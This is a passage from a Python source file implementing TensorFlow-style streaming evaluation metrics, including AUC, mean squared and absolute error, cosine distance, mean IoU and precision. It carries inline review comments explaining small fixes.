    predictions: A floating point `Tensor` of arbitrary shape and whose values
      are in the range `[0, 1]`.
    thresholds: A python list or tuple of float thresholds in `[0, 1]`.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions must
      be either `1`, or the same as the corresponding `labels` dimension).
    includes: Tuple of keys to return, from 'tp', 'fn', 'tn', fp'. If `None`,
      default to all four.

  Returns:
    values: Dict of variables of shape `[len(thresholds)]`. Keys are from
      `includes`.
    update_ops: Dict of operations that increments the `values`. Keys are from
      `includes`.

  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      `includes` contains invalid keys.
  """
  all_includes = ('tp', 'fn', 'tn', 'fp')
  if includes is None:
    includes = all_includes
  else:
    for include in includes:
      if include not in all_includes:
        # NOTE(review): "Invaild" is a typo, but it is a runtime error-message
        # string, so it is intentionally left byte-identical here.
        raise ValueError('Invaild key: %s.' % include)
  labels, predictions, weights = _remove_squeezable_dimensions(
      labels, predictions, weights)
  predictions.get_shape().assert_is_compatible_with(labels.get_shape())
  num_thresholds = len(thresholds)
  # Reshape predictions and labels.
  # predictions becomes a column [N, 1]; labels a row [1, N]. Together with
  # the [num_thresholds, N] tiling below, each (threshold, example) pair gets
  # its own entry so all thresholds are evaluated in one pass.
  predictions_2d = array_ops.reshape(predictions, [-1, 1])
  labels_2d = array_ops.reshape(
      math_ops.cast(labels, dtype=dtypes.bool), [1, -1])
  # Use static shape if known.
  num_predictions = predictions_2d.get_shape().as_list()[0]
  # Otherwise use dynamic shape.
  if num_predictions is None:
    num_predictions = array_ops.shape(predictions_2d)[0]
  # thresh_tiled[i, j] == thresholds[i] for every example j.
  thresh_tiled = array_ops.tile(
      array_ops.expand_dims(array_ops.constant(thresholds), [1]),
      array_ops.stack([1, num_predictions]))
  # Tile the predictions after thresholding them across different thresholds.
  # pred_is_pos[i, j]: prediction j is strictly above thresholds[i].
  pred_is_pos = math_ops.greater(
      array_ops.tile(array_ops.transpose(predictions_2d), [num_thresholds, 1]),
      thresh_tiled)
  # Negations are only built when a requested metric actually needs them.
  if ('fn' in includes) or ('tn' in includes):
    pred_is_neg = math_ops.logical_not(pred_is_pos)
  # Tile labels by number of thresholds
  label_is_pos = array_ops.tile(labels_2d, [num_thresholds, 1])
  if ('fp' in includes) or ('tn' in includes):
    label_is_neg = math_ops.logical_not(label_is_pos)
  if weights is not None:
    # Broadcast weights against the (unreshaped) predictions, then tile them
    # to the same [num_thresholds, N] layout as the indicator matrices.
    weights = _broadcast_weights(math_ops.to_float(weights), predictions)
    weights_tiled = array_ops.tile(array_ops.reshape(
        weights, [1, -1]), [num_thresholds, 1])
    thresh_tiled.get_shape().assert_is_compatible_with(
        weights_tiled.get_shape())
  else:
    weights_tiled = None
  values = {}
  update_ops = {}
  # Each requested quadrant gets its own local accumulator of shape
  # [num_thresholds], updated with the per-threshold row sums of the
  # (optionally weighted) 0/1 indicator matrix.
  if 'tp' in includes:
    true_p = _create_local('true_positives', shape=[num_thresholds])
    is_true_positive = math_ops.to_float(
        math_ops.logical_and(label_is_pos, pred_is_pos))
    if weights_tiled is not None:
      is_true_positive *= weights_tiled
    update_ops['tp'] = state_ops.assign_add(
        true_p, math_ops.reduce_sum(is_true_positive, 1))
    values['tp'] = true_p
  if 'fn' in includes:
    false_n = _create_local('false_negatives', shape=[num_thresholds])
    is_false_negative = math_ops.to_float(
        math_ops.logical_and(label_is_pos, pred_is_neg))
    if weights_tiled is not None:
      is_false_negative *= weights_tiled
    update_ops['fn'] = state_ops.assign_add(
        false_n, math_ops.reduce_sum(is_false_negative, 1))
    values['fn'] = false_n
  if 'tn' in includes:
    true_n = _create_local('true_negatives', shape=[num_thresholds])
    is_true_negative = math_ops.to_float(
        math_ops.logical_and(label_is_neg, pred_is_neg))
    if weights_tiled is not None:
      is_true_negative *= weights_tiled
    update_ops['tn'] = state_ops.assign_add(
        true_n, math_ops.reduce_sum(is_true_negative, 1))
    values['tn'] = true_n
  if 'fp' in includes:
    false_p = _create_local('false_positives', shape=[num_thresholds])
    is_false_positive = math_ops.to_float(
        math_ops.logical_and(label_is_neg, pred_is_pos))
    if weights_tiled is not None:
      is_false_positive *= weights_tiled
    update_ops['fp'] = state_ops.assign_add(
        false_p, math_ops.reduce_sum(is_false_positive, 1))
    values['fp'] = false_p
  return values, update_ops
def auc(labels, predictions, weights=None, num_thresholds=200,
        metrics_collections=None, updates_collections=None,
        curve='ROC', name=None):
  """Computes the approximate AUC via a Riemann sum.

  The `auc` function creates four local variables, `true_positives`,
  `true_negatives`, `false_positives` and `false_negatives` that are used to
  compute the AUC. To discretize the AUC curve, a linearly spaced set of
  thresholds is used to compute pairs of recall and precision values. The area
  under the ROC-curve is therefore computed using the height of the recall
  values by the false positive rate, while the area under the PR-curve is the
  computed using the height of the precision values by the recall.

  This value is ultimately returned as `auc`, an idempotent operation that
  computes the area under a discretized curve of precision versus recall
  values (computed using the aforementioned variables). The `num_thresholds`
  variable controls the degree of discretization with larger numbers of
  thresholds more closely approximating the true AUC. The quality of the
  approximation may vary dramatically depending on `num_thresholds`.

  For best results, `predictions` should be distributed approximately
  uniformly in the range [0, 1] and not peaked around 0 or 1. The quality of
  the AUC approximation may be poor if this is not the case.

  For estimation of the metric over a stream of data, the function creates an
  `update_op` operation that updates these variables and returns the `auc`.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: A `bool` `Tensor` whose shape matches `predictions`.
    predictions: A floating point `Tensor` of arbitrary shape and whose values
      are in the range `[0, 1]`.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions
      must be either `1`, or the same as the corresponding `labels`
      dimension).
    num_thresholds: The number of thresholds to use when discretizing the roc
      curve.
    metrics_collections: An optional list of collections that `auc` should be
      added to.
    updates_collections: An optional list of collections that `update_op`
      should be added to.
    curve: Specifies the name of the curve to be computed, 'ROC' [default] or
      'PR' for the Precision-Recall-curve.
    name: An optional variable_scope name.

  Returns:
    auc: A scalar `Tensor` representing the current area-under-curve.
    update_op: An operation that increments the `true_positives`,
      `true_negatives`, `false_positives` and `false_negatives` variables
      appropriately and whose value matches `auc`.

  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      either `metrics_collections` or `updates_collections` are not a list or
      tuple.
  """
  with variable_scope.variable_scope(
      name, 'auc', (labels, predictions, weights)):
    # Idiomatic membership test instead of chained != comparisons.
    if curve not in ('ROC', 'PR'):
      raise ValueError('curve must be either ROC or PR, %s unknown' % curve)
    kepsilon = 1e-7  # to account for floating point imprecisions
    # num_thresholds - 2 evenly spaced interior thresholds, plus endpoints
    # nudged just outside [0, 1] so every prediction is strictly classified.
    thresholds = [(i + 1) * 1.0 / (num_thresholds - 1)
                  for i in range(num_thresholds - 2)]
    thresholds = [0.0 - kepsilon] + thresholds + [1.0 + kepsilon]
    values, update_ops = _confusion_matrix_at_thresholds(
        labels, predictions, thresholds, weights)
    # Add epsilons to avoid dividing by 0.
    epsilon = 1.0e-6
    def compute_auc(tp, fn, tn, fp, name):
      """Computes the roc-auc or pr-auc based on confusion counts."""
      rec = math_ops.div(tp + epsilon, tp + fn + epsilon)
      if curve == 'ROC':
        fp_rate = math_ops.div(fp, fp + tn + epsilon)
        x = fp_rate
        y = rec
      else:  # curve == 'PR'.
        prec = math_ops.div(tp + epsilon, tp + fp + epsilon)
        x = rec
        y = prec
      # Riemann sum of trapezoids between consecutive thresholds.
      return math_ops.reduce_sum(math_ops.multiply(
          x[:num_thresholds - 1] - x[1:],
          (y[:num_thresholds - 1] + y[1:]) / 2.), name=name)
    # sum up the areas of all the trapeziums
    auc_value = compute_auc(
        values['tp'], values['fn'], values['tn'], values['fp'], 'value')
    update_op = compute_auc(
        update_ops['tp'], update_ops['fn'], update_ops['tn'],
        update_ops['fp'], 'update_op')
    if metrics_collections:
      ops.add_to_collections(metrics_collections, auc_value)
    if updates_collections:
      ops.add_to_collections(updates_collections, update_op)
    return auc_value, update_op
def mean_absolute_error(labels, predictions, weights=None,
                        metrics_collections=None,
                        updates_collections=None,
                        name=None):
  """Computes the mean absolute error between the labels and predictions.

  The `mean_absolute_error` function creates two local variables, `total` and
  `count` that are used to compute the mean absolute error. This average is
  weighted by `weights`, and it is ultimately returned as
  `mean_absolute_error`: an idempotent operation that simply divides `total`
  by `count`.

  For estimation of the metric over a stream of data, the function creates an
  `update_op` operation that updates these variables and returns the
  `mean_absolute_error`. Internally, an `absolute_errors` operation computes
  the absolute value of the differences between `predictions` and `labels`.
  Then `update_op` increments `total` with the reduced sum of the product of
  `weights` and `absolute_errors`, and it increments `count` with the reduced
  sum of `weights`

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: A `Tensor` of the same shape as `predictions`.
    predictions: A `Tensor` of arbitrary shape.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions
      must be either `1`, or the same as the corresponding `labels`
      dimension).
    metrics_collections: An optional list of collections that
      `mean_absolute_error` should be added to.
    updates_collections: An optional list of collections that `update_op`
      should be added to.
    name: An optional variable_scope name.

  Returns:
    mean_absolute_error: A `Tensor` representing the current mean, the value
      of `total` divided by `count`.
    update_op: An operation that increments the `total` and `count` variables
      appropriately and whose value matches `mean_absolute_error`.

  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      either `metrics_collections` or `updates_collections` are not a list or
      tuple.
  """
  # Fix: _remove_squeezable_dimensions returns (labels, predictions, weights),
  # but the original unpacked into (predictions, labels, weights), silently
  # swapping the two tensors. |predictions - labels| is symmetric so the
  # metric value was unaffected, but the weight-squeezing logic keyed off the
  # wrong tensor. This also matches how `accuracy` and `mean_cosine_distance`
  # unpack the helper in this file.
  labels, predictions, weights = _remove_squeezable_dimensions(
      labels, predictions, weights)
  predictions.get_shape().assert_is_compatible_with(labels.get_shape())
  absolute_errors = math_ops.abs(predictions - labels)
  return mean(absolute_errors, weights, metrics_collections,
              updates_collections, name or 'mean_absolute_error')
def mean_cosine_distance(labels, predictions, dim, weights=None,
                         metrics_collections=None,
                         updates_collections=None,
                         name=None):
  """Computes the cosine distance between the labels and predictions.

  Two local variables, `total` and `count`, accumulate the streaming mean of
  the per-example similarity (sum of elementwise products along `dim`); the
  reported distance is `1 - mean_similarity`, an idempotent value, and
  `update_op` folds each batch into the accumulators.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: A `Tensor` of arbitrary shape.
    predictions: A `Tensor` of the same shape as `labels`.
    dim: The dimension along which the cosine distance is computed.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions
      must be either `1`, or the same as the corresponding `labels`
      dimension). Also, dimension `dim` must be `1`.
    metrics_collections: An optional list of collections that the metric
      value variable should be added to.
    updates_collections: An optional list of collections that the metric
      update ops should be added to.
    name: An optional variable_scope name.

  Returns:
    mean_distance: A `Tensor` representing the current mean, the value of
      `total` divided by `count`.
    update_op: An operation that increments the `total` and `count` variables
      appropriately.

  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or
      if either `metrics_collections` or `updates_collections` are not a list
      or tuple.
  """
  labels, predictions, weights = _remove_squeezable_dimensions(
      labels, predictions, weights)
  predictions.get_shape().assert_is_compatible_with(labels.get_shape())
  # Per-example similarity: sum of elementwise products along `dim`.
  # NOTE(review): this equals cosine similarity only if the inputs are
  # unit-normalized along `dim` — no normalization happens here; confirm
  # against callers.
  similarity = math_ops.multiply(predictions, labels)
  similarity = math_ops.reduce_sum(similarity,
                                   reduction_indices=[dim,],
                                   keep_dims=True)
  mean_similarity, update_op = mean(similarity, weights,
                                    None,
                                    None,
                                    name or 'mean_cosine_distance')
  # Distance = 1 - similarity (applied to both the value and the update).
  mean_distance = math_ops.subtract(1.0, mean_similarity)
  update_op = math_ops.subtract(1.0, update_op)
  if metrics_collections:
    ops.add_to_collections(metrics_collections, mean_distance)
  if updates_collections:
    ops.add_to_collections(updates_collections, update_op)
  return mean_distance, update_op
def mean_iou(labels,
             predictions,
             num_classes,
             weights=None,
             metrics_collections=None,
             updates_collections=None,
             name=None):
  """Calculate per-step mean Intersection-Over-Union (mIOU).

  Mean Intersection-Over-Union is a common evaluation metric for
  semantic image segmentation, which first computes the IOU for each
  semantic class and then computes the average over classes.
  IOU is defined as follows:
    IOU = true_positive / (true_positive + false_positive + false_negative).
  The predictions are accumulated in a confusion matrix, weighted by
  `weights`, and mIOU is then calculated from it.

  For estimation of the metric over a stream of data, the function creates an
  `update_op` operation that updates these variables and returns the
  `mean_iou`.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: A `Tensor` of ground truth labels with shape [batch size] and of
      type `int32` or `int64`. The tensor will be flattened if its rank > 1.
    predictions: A `Tensor` of prediction results for semantic labels, whose
      shape is [batch size] and type `int32` or `int64`. The tensor will be
      flattened if its rank > 1.
    num_classes: The possible number of labels the prediction task can
      have. This value must be provided, since a confusion matrix of
      dimension = [num_classes, num_classes] will be allocated.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions
      must be either `1`, or the same as the corresponding `labels`
      dimension).
    metrics_collections: An optional list of collections that `mean_iou`
      should be added to.
    updates_collections: An optional list of collections `update_op` should
      be added to.
    name: An optional variable_scope name.

  Returns:
    mean_iou: A `Tensor` representing the mean intersection-over-union.
    update_op: An operation that increments the confusion matrix.

  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or
      if either `metrics_collections` or `updates_collections` are not a list
      or tuple.
  """
  with variable_scope.variable_scope(
      name, 'mean_iou', (predictions, labels, weights)):
    # Check if shape is compatible.
    predictions.get_shape().assert_is_compatible_with(labels.get_shape())
    # Local variable to accumulate the predictions in the confusion matrix.
    # Fix: the dtype condition was inverted. Unweighted counts are integral,
    # so int64 is exact; float `weights` produce fractional counts, which
    # require a float64 accumulator.
    cm_dtype = dtypes.float64 if weights is not None else dtypes.int64
    total_cm = _create_local('total_confusion_matrix',
                             shape=[num_classes, num_classes], dtype=cm_dtype)
    # Cast the type to int64 required by confusion_matrix_ops.
    predictions = math_ops.to_int64(predictions)
    labels = math_ops.to_int64(labels)
    num_classes = math_ops.to_int64(num_classes)
    # Flatten the input if its rank > 1.
    if predictions.get_shape().ndims > 1:
      predictions = array_ops.reshape(predictions, [-1])
    if labels.get_shape().ndims > 1:
      labels = array_ops.reshape(labels, [-1])
    if (weights is not None) and (weights.get_shape().ndims > 1):
      weights = array_ops.reshape(weights, [-1])
    # Accumulate the prediction to current confusion matrix.
    current_cm = confusion_matrix.confusion_matrix(
        labels, predictions, num_classes, weights=weights, dtype=cm_dtype)
    update_op = state_ops.assign_add(total_cm, current_cm)
    def compute_mean_iou(name):
      """Compute the mean intersection-over-union via the confusion matrix."""
      sum_over_row = math_ops.to_float(math_ops.reduce_sum(total_cm, 0))
      sum_over_col = math_ops.to_float(math_ops.reduce_sum(total_cm, 1))
      cm_diag = math_ops.to_float(array_ops.diag_part(total_cm))
      # Per-class union = row sum + column sum - diagonal (TP counted twice).
      denominator = sum_over_row + sum_over_col - cm_diag
      # If the value of the denominator is 0, set it to 1 to avoid
      # zero division.
      denominator = array_ops.where(
          math_ops.greater(denominator, 0),
          denominator,
          array_ops.ones_like(denominator))
      iou = math_ops.div(cm_diag, denominator)
      return math_ops.reduce_mean(iou, name=name)
    mean_iou_v = compute_mean_iou('mean_iou')
    if metrics_collections:
      ops.add_to_collections(metrics_collections, mean_iou_v)
    if updates_collections:
      ops.add_to_collections(updates_collections, update_op)
    return mean_iou_v, update_op
def mean_relative_error(labels, predictions, normalizer, weights=None,
                        metrics_collections=None,
                        updates_collections=None,
                        name=None):
  """Computes the mean relative error by normalizing with the given values.
  Internally this delegates to `mean`, which maintains two local variables,
  `total` and `count`. Each batch contributes the element-wise value
  `|labels - predictions| / normalizer`, taken to be 0 wherever `normalizer`
  is 0, optionally scaled by `weights`. The returned metric is the idempotent
  ratio `total / count`, and `update_op` folds a new batch into both.
  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
  Args:
    labels: A `Tensor` of the same shape as `predictions`.
    predictions: A `Tensor` of arbitrary shape.
    normalizer: A `Tensor` of the same shape as `predictions`.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions must
      be either `1`, or the same as the corresponding `labels` dimension).
    metrics_collections: An optional list of collections that
      `mean_relative_error` should be added to.
    updates_collections: An optional list of collections that `update_op` should
      be added to.
    name: An optional variable_scope name.
  Returns:
    mean_relative_error: A `Tensor` representing the current mean, the value of
      `total` divided by `count`.
    update_op: An operation that increments the `total` and `count` variables
      appropriately and whose value matches `mean_relative_error`.
  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      either `metrics_collections` or `updates_collections` are not a list or
      tuple.
  """
  labels, predictions, weights = _remove_squeezable_dimensions(
      labels, predictions, weights)
  predictions.get_shape().assert_is_compatible_with(labels.get_shape())
  predictions, normalizer = confusion_matrix.remove_squeezable_dimensions(
      predictions, normalizer)
  predictions.get_shape().assert_is_compatible_with(normalizer.get_shape())
  # Report a relative error of 0 where the normalizer is exactly 0, rather
  # than dividing by zero.
  absolute_difference = math_ops.abs(labels - predictions)
  relative_errors = array_ops.where(
      math_ops.equal(normalizer, 0.0),
      array_ops.zeros_like(labels),
      math_ops.div(absolute_difference, normalizer))
  return mean(relative_errors, weights, metrics_collections,
              updates_collections, name or 'mean_relative_error')
def mean_squared_error(labels, predictions, weights=None,
                       metrics_collections=None,
                       updates_collections=None,
                       name=None):
  """Computes the mean squared error between the labels and predictions.
  Internally this delegates to `mean`, which maintains two local variables,
  `total` and `count`. Each batch contributes the element-wise squared
  difference `(labels - predictions)**2`, optionally scaled by `weights`.
  The returned metric is the idempotent ratio `total / count`, and
  `update_op` folds a new batch into both accumulators.
  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
  Args:
    labels: A `Tensor` of the same shape as `predictions`.
    predictions: A `Tensor` of arbitrary shape.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions must
      be either `1`, or the same as the corresponding `labels` dimension).
    metrics_collections: An optional list of collections that
      `mean_squared_error` should be added to.
    updates_collections: An optional list of collections that `update_op` should
      be added to.
    name: An optional variable_scope name.
  Returns:
    mean_squared_error: A `Tensor` representing the current mean, the value of
      `total` divided by `count`.
    update_op: An operation that increments the `total` and `count` variables
      appropriately and whose value matches `mean_squared_error`.
  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      either `metrics_collections` or `updates_collections` are not a list or
      tuple.
  """
  labels, predictions, weights = _remove_squeezable_dimensions(
      labels, predictions, weights)
  predictions.get_shape().assert_is_compatible_with(labels.get_shape())
  squared_difference = math_ops.square(labels - predictions)
  return mean(squared_difference, weights, metrics_collections,
              updates_collections, name or 'mean_squared_error')
def mean_tensor(values, weights=None, metrics_collections=None,
                updates_collections=None, name=None):
  """Computes the element-wise (weighted) mean of the given tensors.
  In contrast to the `mean` function which returns a scalar with the
  mean, this function returns an average tensor with the same shape as the
  input tensors.
  The `mean_tensor` function creates two local variables,
  `total_tensor` and `count_tensor` that are used to compute the average of
  `values`. This average is ultimately returned as `mean` which is an idempotent
  operation that simply divides `total` by `count`.
  For estimation of the metric over a stream of data, the function creates an
  `update_op` operation that updates these variables and returns the `mean`.
  `update_op` increments `total` with the reduced sum of the product of `values`
  and `weights`, and it increments `count` with the reduced sum of `weights`.
  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
  Args:
    values: A `Tensor` of arbitrary dimensions.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `values`, and must be broadcastable to `values` (i.e., all dimensions must
      be either `1`, or the same as the corresponding `values` dimension).
    metrics_collections: An optional list of collections that `mean`
      should be added to.
    updates_collections: An optional list of collections that `update_op`
      should be added to.
    name: An optional variable_scope name.
  Returns:
    mean: A float `Tensor` representing the current mean, the value of `total`
      divided by `count`.
    update_op: An operation that increments the `total` and `count` variables
      appropriately and whose value matches `mean_value`.
  Raises:
    ValueError: If `weights` is not `None` and its shape doesn't match `values`,
      or if either `metrics_collections` or `updates_collections` are not a list
      or tuple.
  """
  with variable_scope.variable_scope(name, 'mean', (values, weights)):
    values = math_ops.to_float(values)
    # Element-wise accumulators: unlike `mean`, these keep the full static
    # shape of `values` so an average is tracked per element.
    total = _create_local('total_tensor', shape=values.get_shape())
    count = _create_local('count_tensor', shape=values.get_shape())
    # With no weights, each element counts once per batch.
    num_values = array_ops.ones_like(values)
    if weights is not None:
      weights = _broadcast_weights(math_ops.to_float(weights), values)
      values = math_ops.multiply(values, weights)
      num_values = math_ops.multiply(num_values, weights)
    total_compute_op = state_ops.assign_add(total, values)
    count_compute_op = state_ops.assign_add(count, num_values)
    def compute_mean(total, count, name):
      # Clamp the divisor to at least 1 element-wise so positions that have
      # received no (or zero-weight) values divide by 1 instead of 0.
      non_zero_count = math_ops.maximum(count,
                                        array_ops.ones_like(count),
                                        name=name)
      return math_ops.truediv(total, non_zero_count, name=name)
    mean_t = compute_mean(total, count, 'value')
    # `update_op` first folds the current batch into the accumulators, then
    # recomputes the mean from the updated state.
    with ops.control_dependencies([total_compute_op, count_compute_op]):
      update_op = compute_mean(total, count, 'update_op')
    if metrics_collections:
      ops.add_to_collections(metrics_collections, mean_t)
    if updates_collections:
      ops.add_to_collections(updates_collections, update_op)
    return mean_t, update_op
def percentage_below(values, threshold, weights=None,
                     metrics_collections=None,
                     updates_collections=None,
                     name=None):
  """Computes the percentage of values less than the given threshold.
  Internally this delegates to `mean` over the indicator
  `float(values < threshold)`, so two local variables `total` and `count`
  accumulate the (optionally weighted) fraction of values below `threshold`.
  The returned metric is the idempotent ratio `total / count`, and
  `update_op` folds a new batch into both accumulators.
  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
  Args:
    values: A numeric `Tensor` of arbitrary size.
    threshold: A scalar threshold.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `values`, and must be broadcastable to `values` (i.e., all dimensions must
      be either `1`, or the same as the corresponding `values` dimension).
    metrics_collections: An optional list of collections that the metric
      value variable should be added to.
    updates_collections: An optional list of collections that the metric update
      ops should be added to.
    name: An optional variable_scope name.
  Returns:
    percentage: A `Tensor` representing the current mean, the value of `total`
      divided by `count`.
    update_op: An operation that increments the `total` and `count` variables
      appropriately.
  Raises:
    ValueError: If `weights` is not `None` and its shape doesn't match `values`,
      or if either `metrics_collections` or `updates_collections` are not a list
      or tuple.
  """
  below_threshold = math_ops.to_float(math_ops.less(values, threshold))
  return mean(below_threshold, weights, metrics_collections,
              updates_collections, name or 'percentage_below_threshold')
def _count_condition(values, weights=None, metrics_collections=None,
                     updates_collections=None):
  """Sums the weights of cases where the given values are True.
  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
  Args:
    values: A `bool` `Tensor` of arbitrary size.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `values`, and must be broadcastable to `values` (i.e., all dimensions must
      be either `1`, or the same as the corresponding `values` dimension).
    metrics_collections: An optional list of collections that the metric
      value variable should be added to.
    updates_collections: An optional list of collections that the metric update
      ops should be added to.
  Returns:
    value_tensor: A `Tensor` representing the current value of the metric.
    update_op: An operation that accumulates the error from a batch of data.
  Raises:
    ValueError: If `weights` is not `None` and its shape doesn't match `values`,
      or if either `metrics_collections` or `updates_collections` are not a list
      or tuple.
  """
  check_ops.assert_type(values, dtypes.bool)
  # Scalar accumulator for the running (weighted) count of True entries.
  count = _create_local('count', shape=[])
  values = math_ops.to_float(values)
  if weights is not None:
    # Runtime check: weights must be a scalar or match the rank of `values`.
    with ops.control_dependencies((
        check_ops.assert_rank_in(weights, (0, array_ops.rank(values))),)):
      weights = math_ops.to_float(weights)
      values = math_ops.multiply(values, weights)
  # `identity` decouples the read of the metric value from the update op.
  value_tensor = array_ops.identity(count)
  update_op = state_ops.assign_add(count, math_ops.reduce_sum(values))
  if metrics_collections:
    ops.add_to_collections(metrics_collections, value_tensor)
  if updates_collections:
    ops.add_to_collections(updates_collections, update_op)
  return value_tensor, update_op
def true_positives(labels, predictions, weights=None,
                   metrics_collections=None,
                   updates_collections=None,
                   name=None):
  """Sum the weights of true_positives.
  A true positive is an element where both the label and the prediction
  equal 1; this accumulates the (optionally weighted) count of such
  elements via `_count_condition`.
  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
  Args:
    labels: The ground truth values, a `bool` `Tensor` whose dimensions must
      match `predictions`.
    predictions: The predicted values, a `bool` `Tensor` of arbitrary
      dimensions.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions must
      be either `1`, or the same as the corresponding `labels` dimension).
    metrics_collections: An optional list of collections that the metric
      value variable should be added to.
    updates_collections: An optional list of collections that the metric update
      ops should be added to.
    name: An optional variable_scope name.
  Returns:
    value_tensor: A `Tensor` representing the current value of the metric.
    update_op: An operation that accumulates the error from a batch of data.
  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      either `metrics_collections` or `updates_collections` are not a list or
      tuple.
  """
  with variable_scope.variable_scope(
      name, 'true_positives', (predictions, labels, weights)):
    labels = ops.convert_to_tensor(labels)
    predictions = ops.convert_to_tensor(predictions)
    predictions.get_shape().assert_is_compatible_with(labels.get_shape())
    # True positive: label == 1 and prediction == 1.
    both_positive = math_ops.logical_and(math_ops.equal(labels, 1),
                                         math_ops.equal(predictions, 1))
    return _count_condition(both_positive, weights, metrics_collections,
                            updates_collections)
def false_positives(labels, predictions, weights=None,
                    metrics_collections=None,
                    updates_collections=None,
                    name=None):
  """Sum the weights of false positives.
  A false positive is an element where the label is 0 but the prediction
  is 1; this accumulates the (optionally weighted) count of such elements
  via `_count_condition`.
  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
  Args:
    labels: The ground truth values, a `bool` `Tensor` whose dimensions must
      match `predictions`.
    predictions: The predicted values, a `bool` `Tensor` of arbitrary
      dimensions.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions must
      be either `1`, or the same as the corresponding `labels` dimension).
    metrics_collections: An optional list of collections that the metric
      value variable should be added to.
    updates_collections: An optional list of collections that the metric update
      ops should be added to.
    name: An optional variable_scope name.
  Returns:
    value_tensor: A `Tensor` representing the current value of the metric.
    update_op: An operation that accumulates the error from a batch of data.
  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      either `metrics_collections` or `updates_collections` are not a list or
      tuple.
  """
  with variable_scope.variable_scope(
      name, 'false_positives', (predictions, labels, weights)):
    labels = ops.convert_to_tensor(labels)
    predictions = ops.convert_to_tensor(predictions)
    predictions.get_shape().assert_is_compatible_with(labels.get_shape())
    # False positive: label == 0 but prediction == 1.
    spurious_hit = math_ops.logical_and(math_ops.equal(labels, 0),
                                        math_ops.equal(predictions, 1))
    return _count_condition(spurious_hit, weights, metrics_collections,
                            updates_collections)
def precision(labels, predictions, weights=None,
              metrics_collections=None, updates_collections=None,
              name=None):
  """Computes the precision of the predictions with respect to the labels.
  The `precision` function creates two local variables,
  `true_positives` and `false_positives`, that are used to compute the
  precision. This value is ultimately returned as `precision`, an idempotent
  operation that simply divides `true_positives` by the sum of `true_positives`
  and `false_positives`.
  For estimation of the metric over a stream of data, the function creates an
  `update_op` operation that updates these variables and returns the
  `precision`. `update_op` weights each prediction by the corresponding value in
  `weights`.
  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
  Args:
    labels: The ground truth values, a `bool` `Tensor` whose dimensions must
      match `predictions`.
    predictions: The predicted values, a `bool` `Tensor` of arbitrary shape.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions must
      be either `1`, or the same as the corresponding `labels` dimension).
    metrics_collections: An optional list of collections that `precision` should
      be added to.
    updates_collections: An optional list of collections that `update_op` should
      be added to.
    name: An optional variable_scope name.
  Returns:
    precision: Scalar float `Tensor` with the value of `true_positives`
      divided by the sum of `true_positives` and `false_positives`.
    update_op: `Operation` that increments `true_positives` and
      `false_positives` variables appropriately and whose value matches
      `precision`.
  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      either `metrics_collections` or `updates_collections` are not a list or
      tuple.
  """
  with variable_scope.variable_scope(
      name, 'precision', (predictions, labels, weights)):
    labels, predictions, weights = _remove_squeezable_dimensions(
        labels, predictions, weights)
    predictions.get_shape().assert_is_compatible_with(labels.get_shape())
    # Streaming tp/fp accumulators; collections are handled here, not in the
    # sub-metrics, so pass None through.
    true_p, true_positives_update_op = true_positives(
        labels, predictions, weights, metrics_collections=None,
        updates_collections=None, name=None)
    false_p, false_positives_update_op = false_positives(
        labels, predictions, weights, metrics_collections=None,
        updates_collections=None, name=None)
    def compute_precision(name):
      # tp / (tp + fp), defined as 0 when there are no positive predictions.
      return array_ops.where(
          math_ops.greater(true_p + false_p, 0),
